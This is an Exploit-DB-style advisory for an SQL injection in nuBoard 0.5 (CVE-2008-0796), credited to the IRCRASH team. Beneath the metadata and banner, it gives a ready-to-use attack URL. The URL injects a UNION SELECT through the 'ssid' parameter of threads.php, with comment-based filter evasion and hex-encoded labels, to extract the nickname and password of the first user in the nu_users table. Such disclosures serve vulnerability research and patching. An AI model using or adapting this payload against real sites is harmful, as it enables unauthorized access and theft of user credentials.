nuBoard 0.5 - 'ssid' SQL Injection
Author: Khashayar Fereidani
type: webapps
platform: php
port:
date_added: 2008-02-13
date_updated: 2016-11-14
verified: 1
codes: OSVDB-41789;CVE-2008-0796
tags:
aliases:
screenshot_url:
application_url: http://www.exploit-db.comnuboard_v0.5.tar.gz
#####################################################################################
#### Nuboard_v0.5 SQL Injection Vulnerability ####
#### By IRCRASH ####
#####################################################################################
# #
#AUTHOR : IRCRASH #
#Discovered by : Dr.Crash #
#Exploited By : Dr.Crash #
#IRCRASH Team Members : Dr.Crash - Malc0de - R3d.w0rm #
# #
#####################################################################################
# #
#Script Download : http://switch.dl.sourceforge.net/sourceforge/nuboard/nuboard_v0.5.tar.gz
# #
#####################################################################################
# < SQL > #
#SQL Address : http://Target/threads.php?ssid=9999%27union/**/select/**/CoNcAt(0x4c6f67696e3a,nick,0x3c656e64757365723e,0x0d0a50617373776f72643a,password,0x3c656e64706173733e)/***/from/**/nu_users/**/where/**/id=1/*
# #
#####################################################################################
# Our site : Http://IRCRASH.COM #
#####################################################################################
# milw0rm.com [2008-02-14]